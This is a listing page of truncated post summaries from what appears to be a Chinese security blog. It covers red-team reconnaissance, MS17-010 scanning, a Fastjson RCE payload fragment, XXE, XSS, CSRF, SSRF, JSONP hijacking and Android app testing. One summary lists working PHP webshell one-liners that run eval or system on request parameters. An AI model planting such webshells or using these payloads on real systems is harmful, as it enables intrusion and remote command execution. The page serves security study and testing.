上一页 1 ··· 3 4 5 6 7
  2020年4月24日
摘要: 目录一次性进程 Definition对话进程 Definition退出的方法Reference Docker在运行程序的时候,需要区分运行的程序是一次性进程还是对话进程,不同的进程之间的操作方式会有差异。 一次性进程 Definition 一些简单进程是不需要交互的,比如hello-world,运行 阅读全文
posted @ 2020-04-24 20:23 Mysticbinary 阅读(455) 评论(0) 推荐(0)
摘要: 目录内网扫描案例蓝队参考 红队在突破后可以采集的信息(攻击视角) 在获得初始立足点(例如一台普通用户电脑的权限)后,红队的目标是横向移动和权限提升,最终达成攻击目标(如获取核心数据)。在这个过程中,他们会系统性地采集以下信息: 网络环境信息 网络拓扑:* 通过ipconfig /all, route 阅读全文
posted @ 2020-04-24 18:09 Mysticbinary 阅读(859) 评论(0) 推荐(0)
摘要: 目录利用Nmap检测MSF反弹SHELL注意乱码参考 利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加个sudo IP/24 = 8位地址范围,对应的子网掩码简单理解: ip/24 11111111 111111 阅读全文
posted @ 2020-04-24 14:10 Mysticbinary 阅读(4282) 评论(0) 推荐(0)
  2020年4月21日
摘要: 目录Wireshark的抓包原理抓包过滤器使用演示添加一条自定义的抓包规则选择自定义的抓包规则如何过滤出有用的数据? Wireshark是网络数据包分析器,可实时从网络接口捕获数据包中的数据。它能详细地显示捕获的数据以供用户检查它们的内容,并支持检索过滤,支持多协议的网络数据包解析。 Wiresha 阅读全文
posted @ 2020-04-21 16:25 Mysticbinary 阅读(3846) 评论(2) 推荐(6)
  2020年4月17日
摘要: 目录一些规定基础型查询符号使用布尔逻辑复合型查询站点的信息收集过滤出功能过滤出敏感文件参考 这个技术主要可以完成对海量信息,进行筛选和过滤出有用的数据。 范围是被企业对公网开放且被搜索引擎爬取入库的信息。 红队、挖企业SRC漏洞的人会常用。 一些规定 搜索引擎不区分大小写; Google限制最多搜索 阅读全文
posted @ 2020-04-17 16:16 Mysticbinary 阅读(2036) 评论(0) 推荐(3)
  2020年4月16日
该文被密码保护。 阅读全文
posted @ 2020-04-16 12:02 Mysticbinary 阅读(380) 评论(0) 推荐(0)
  2020年4月15日
摘要: 目录payload利用java.net.Inet[4|6]Address参考 Fastjson <= 1.2.47 远程命令执行漏洞利用工具及方法记录 payload rmi://、ldap:// 可以切换尝试。 param={ "@type": "java.lang.Class", br / > 阅读全文
posted @ 2020-04-15 15:01 Mysticbinary 阅读(2596) 评论(0) 推荐(1)
摘要: 由于全球IPv4地址越来越少、越来越贵,因此大到一个组织,小到一个家庭一个人都很难获得公网IP地址,所以只能使用内网地址,从而和别人共享一个公网IP地址。在这种情况下,NAT技术诞生。 翻译 NAT(Network Address Translation:网络地址转换)是将IP 数据包头中的IP 地 阅读全文
posted @ 2020-04-15 10:21 Mysticbinary 阅读(2275) 评论(0) 推荐(0)
  2020年4月9日
摘要: 目录What is XXE?XXE与XML注入的区别?XXE漏洞原理XXE的特征XXE测试在线工具:注意pyload任意读取文件测试代码审计XXE,基于Java语言修复方案Reference What is XXE? XML external entity injection (also known 阅读全文
posted @ 2020-04-09 18:00 Mysticbinary 阅读(24422) 评论(0) 推荐(1)
  2020年4月4日
摘要: CentOS7主要有rpm和yum这两种包软件的管理: RPM —— Package Manager 是一个强大的命令行驱动的软件包管理工具,用来安装、卸载、校验、查询和更新 Linux 系统上的软件包。 YUM —— Yellow dog Updater, Modified 是一个在 Fedora 阅读全文
posted @ 2020-04-04 15:20 Mysticbinary 阅读(605) 评论(0) 推荐(0)
摘要: 本文直接从防御方式开始讨论,防御CSRF有4种方法: 使用POST替代GET 检验HTTP Referer 验证码 Token 使用POST替代GET 一些程序员在开发的时候都是用GET、POST通用的函数来接收客户端的数据,这样也是某些接口有CSRF的原因之一,但是将全部接口都改成只允许POST方 阅读全文
posted @ 2020-04-04 00:27 Mysticbinary 阅读(2276) 评论(2) 推荐(2)
  2020年4月2日
摘要: 目录同源策略JSONP原理JSONP的由来JSONP劫持的危害B站的JSONP跨域请求流程——案例检测是否存在JSONP劫持 —— 案例方式一 修改reference方式二 制作恶意脚步JSONP劫持的攻击流程场景设定攻击步骤分解关键漏洞分析JSONP劫持与CSRF的比较JSONP劫持的防御方案更详 阅读全文
posted @ 2020-04-02 22:08 Mysticbinary 阅读(1343) 评论(0) 推荐(3)
  2020年4月1日
摘要: 目录加密签名扩展 公开密钥密码学(英语:Public-key cryptography)也称非对称式密码学(英语:Asymmetric cryptography)是密码学的一种算法,它需要两个密钥,一个是公开密钥,另一个是私有密钥。 公私秘钥对的两个典型使用场景: 加密 签名 总结就是: 公钥加密、 阅读全文
posted @ 2020-04-01 23:00 Mysticbinary 阅读(3187) 评论(0) 推荐(2)
摘要: 命令创建账号和密码 adduser Mysticbinary #添加一个Mysticbinary用户 passwd Mysticbinary # 输入密码 授予可以切换root的权限 修改/etc/sudoers文件。 vim /etc/sudoers # Allow root to run any 阅读全文
posted @ 2020-04-01 18:24 Mysticbinary 阅读(789) 评论(0) 推荐(0)
摘要: 目录如何排查为什么#{ }安全?什么情况下用不了#{ }? Mybatis 的 Mapper.xml 语句中 parameterType 向SQL语句传参有两种方式:#{ } 和 ${ } ; 简单来说: #{ }:是预编译处理,能有效防止 SQL 注入,适用于绝大多数场景。 ${ }:是字符串拼接 阅读全文
posted @ 2020-04-01 16:03 Mysticbinary 阅读(2312) 评论(0) 推荐(0)
  2020年3月26日
摘要: 目录方式一 替换微信开发者工具的cookie方式二 给系统默认浏览器设置代理 文章比较久远了,方法失效了。当个留念吧。 做微信公众号开发或者测试的朋友一般都会下载官方的微信开发者工具,来帮助自己开发或者测试。 微信开发者工具下载地址:https://developers.weixin.qq.com/ 阅读全文
posted @ 2020-03-26 23:45 Mysticbinary 阅读(3895) 评论(0) 推荐(1)
摘要: 目录Git的三个空间的认识分支 Git定义: Git可以类比为一个本地文件管理工具,它可以记录文件夹中每个文件每次编辑记录,当然它可以更多结合着远程仓库一起操作,对本地和远程仓库一起管理,达到最好效果。 Git的三个空间的认识 Git命令都很简单,也就十多个常用命令,但是它包含不同空间,不同空间有不 阅读全文
posted @ 2020-03-26 22:59 Mysticbinary 阅读(376) 评论(0) 推荐(0)
摘要: 什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
posted @ 2020-03-26 22:51 Mysticbinary 阅读(763) 评论(0) 推荐(0)
摘要: 目录mysql_real_escape_string()用法案例 类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escap 阅读全文
posted @ 2020-03-26 22:46 Mysticbinary 阅读(1063) 评论(0) 推荐(0)
摘要: 基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
posted @ 2020-03-26 22:41 Mysticbinary 阅读(488) 评论(0) 推荐(0)
摘要: 目录下载证书mac OS导入证书Chrome设置代理Safari设置代理 下面的操作基于Mac OS Catalina(v10.15.3),抓包拦截工具基于Burp Suite v2.1.05。 下载证书 将Burp Suite 的证书下载到本地任意一个路径下。如果使用其它抓包工具,自行搜索一下。 阅读全文
posted @ 2020-03-26 21:53 Mysticbinary 阅读(5221) 评论(0) 推荐(2)
  2020年3月24日
摘要: 目录测试插入其它响应头插入XSS原理分析修复方式 CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过Win和Linux系统用的标识不一样而已。 在HTTP当 阅读全文
posted @ 2020-03-24 17:02 Mysticbinary 阅读(10409) 评论(1) 推荐(0)
  2020年3月22日
摘要: 目录XSSDOM文档利用原理DOM-XSS 场景一:innerHTMLDOM-XSS 场景二:跳转DOM-XSS 场景三:evalDOM-XSS 场景四:cookie、referrerDOM-XSS 场景五:document.write 、document.URL.indexOf("id=")防护策 阅读全文
posted @ 2020-03-22 18:53 Mysticbinary 阅读(38747) 评论(1) 推荐(7)
  2020年1月6日
摘要: 目录标签、事件、属性HTML代码注入script标签a标签img标签 + onerror(都是通过event来调用js)button标签p标签 + onmouseover事件(都是通过event来调用js)body标签 + onload(都是通过event来调用js)var标签input标签 + 属 阅读全文
posted @ 2020-01-06 21:55 Mysticbinary 阅读(3557) 评论(0) 推荐(0)
  2019年12月27日
摘要: APK二次打包的危害 APK二次打包是Android应用安全风险中的一部分, 一般是通过反编译工具向应用中插入广告代码与相关配置,再在第三方应用市场、论坛发布。打包党对移动App带来的危害有以下几种: 1. 插入自己广告或者删除原来广告; 2. 恶意代码, 恶意扣费、木马等; 3. 修改原来支付逻辑 阅读全文
posted @ 2019-12-27 15:40 Mysticbinary 阅读(3891) 评论(0) 推荐(5)
摘要: 目录Janus说明检测方式方式1-使用GetApkInfo.jar工具方式2-把APK改成zip解压查看修复 Janus说明 Android APP仅使用V1签名,可能存在Janus漏洞(CVE-2017-13156),Janus漏洞(CVE-2017-13156)允许攻击者在不改变原签名的情况下任 阅读全文
posted @ 2019-12-27 15:18 Mysticbinary 阅读(2659) 评论(0) 推荐(1)
  2019年12月25日
摘要: 目录测试的意义测试用例测试函数功能案例assert关键字的用法测试类功能案例安全测试案例-短信轰炸__main__全局变量解释总结 测试的意义 人们针对一个具体问题,通过分析和设计,最后用编程语言写出了一个程序,如果它通过了语言解释器(编译器)的检查,可以运行了,那么下一步的工作就是设法确认它确实满 阅读全文
posted @ 2019-12-25 22:40 Mysticbinary 阅读(1096) 评论(2) 推荐(3)
  2019年12月23日
摘要: 一些经验记录。 忽略ssl报错 一些证书校验问题会导致程序报错,解决方法为在发送请求的时候,带上verify=False参数; result = requests.get(burp0_url, headers=burp0_headers, verify=False) 为requests设置代理 这个 阅读全文
posted @ 2019-12-23 20:46 Mysticbinary 阅读(2531) 评论(0) 推荐(1)
  2019年12月22日
摘要: 目录使用with语句前后对比with语句的执行原理自定义open函数总结参考 编程中有很多操作都是配套使用的,这种配套的流程可以称为计算过程,Python语言为这种计算过程专门设计了一种结构:with语句。比如文件处理就是这类计算过程的典型代表。 使用with语句前后对比 没有使用with语句之前, 阅读全文
posted @ 2019-12-22 23:22 Mysticbinary 阅读(683) 评论(1) 推荐(3)
  2019年12月17日
摘要: 目录PyExecJS 使用案例查看JS引擎信息安装PhantomJS步骤案例11.访问目标网站的登录页面并查看源码2.将js放到和py脚本同一级目录下3. 编写Python脚本来调用js案例21.找登录时的加密函数2.监听鼠标点击事件查看流程3.写代码不同浏览器内核版本对URL编码处理也不同[冷知识 阅读全文
posted @ 2019-12-17 17:41 Mysticbinary 阅读(3132) 评论(0) 推荐(3)
  2019年12月10日
摘要: Frida接口功能介绍 Frida是个so级别的hook框架,它可以帮助开发、安全人员对指定的进程的so模块进行分析。它主要提供了功能简单的Python接口和功能丰富的JS接口,使得hook函数和修改so可以编程化,接口中包含了主控端与目标进程的交互接口。 目标进程的交互接口分为: JS接口 功能包 阅读全文
posted @ 2019-12-10 14:17 Mysticbinary 阅读(9918) 评论(0) 推荐(2)
  2019年12月9日
摘要: Frida是什么 我觉得官网已经说得很清楚了。简单的说就是一款动态代码检测工具,可用于各种主流操作系统,这里主要讨论的是动态检测Android系统里面代码运行情况。 Android版的Frida环境的搭建主要分为两个部分,一部分是运行在Android机器上的代理工具 ,另一部分是Windows系统用 阅读全文
posted @ 2019-12-09 19:18 Mysticbinary 阅读(4279) 评论(0) 推荐(2)
  2019年12月8日
摘要: 目录Burp + Python threading库1. Burp Suite安装插件2. 拦截包并拷贝发包的代码3. 运行Python多线程代码4. 确认结果Burp + RepeaterBurp + Turbo Intruder插件修复Reference 有时候想看看Web应用在代码或者数据库层 阅读全文
posted @ 2019-12-08 22:49 Mysticbinary 阅读(1217) 评论(1) 推荐(1)
  2019年11月26日
摘要: 目录在线调试设置规则检查crontab是否启动检查crontab日志检查账号权限和路径 在线调试 https://tool.lu/crontab/ 设置规则 # 每分钟执行一次 */1 * * * * /scripts/script.sh # 每小时执行一次 0 */1 * * * /scripts 阅读全文
posted @ 2019-11-26 11:50 Mysticbinary 阅读(688) 评论(0) 推荐(1)
  2019年11月21日
摘要: 报错特征 在应用市场上下载了一个APK,使用Androd killer的编译的功能,结果报错了,报错信息如下: 解决 解决方式有如下几种,方式多的原因是因为系统对APK的打包方式不同,就导致对应的反编译方式也会不同 方式一 切换JDK版本 可能编写APK的JDK版本是1.7,但是你用1.8来反编译, 阅读全文
posted @ 2019-11-21 19:20 Mysticbinary 阅读(14902) 评论(0) 推荐(1)
  2019年11月19日
摘要: pip安装库时遇到的问题 我使用ubuntu系统通过pip安装MySQLdb库的时候,报了一堆错,解决了半天,没搞定。然后安装另一个库pymysql一下就OK了,它们的功能都是一样的,为什么不行没有研究,这里就做一下记录吧,防止下次在遇到这个问题。 Windows OS 使用MySQLdb库 Lin 阅读全文
posted @ 2019-11-19 19:17 Mysticbinary 阅读(447) 评论(0) 推荐(3)
  2019年10月17日
摘要: 目录需求背景multipart/form-data 格式结构解析使用requests-toolbelt的MultipartEncoder 构造关于boundary的作用参考文章 需求背景 想用requests做一个自动上传的功能,发现失败了,比如直接发POST包,或者直接data=二进制流,都会上传 阅读全文
posted @ 2019-10-17 16:29 Mysticbinary 阅读(10606) 评论(0) 推荐(1)
  2019年10月16日
摘要: 目录第一步pip install第二步Python运行Demo selenium是的作用是模拟点击浏览器上的按钮,配合一个无头浏览器就可以快速解决一些前端需要加解密的功能。 第一步pip install selenium安装的第一步就是用pip把模块下载回来。 pip install seleniu 阅读全文
posted @ 2019-10-16 19:00 Mysticbinary 阅读(2866) 评论(0) 推荐(2)
  2019年9月30日
摘要: 目录需求设置代理Burp Suite代理端设置Android端设置发现证书问题先导出cacert.cer证书传送到Android端Android安装CA证书测试HTTPSAndroid端第二种安装证书的方式更新 需求 Android APP安全测试时,主要工作分为: APK安全 业务安全 APK安全 阅读全文
posted @ 2019-09-30 18:37 Mysticbinary 阅读(16118) 评论(0) 推荐(3)
  2019年9月29日
摘要: 报错背景 今天使用AndroidKiller V1.3.1,反编译一个APK,遇到如下报错: 当前 Apktool 使用版本:Android Killer Default APKTOOL 正在反编译 APK,请稍等... >I: 使用 ShakaApktool 2.0.0-20150914 >I: 阅读全文
posted @ 2019-09-29 20:13 Mysticbinary 阅读(28936) 评论(3) 推荐(2)
上一页 1 ··· 3 4 5 6 7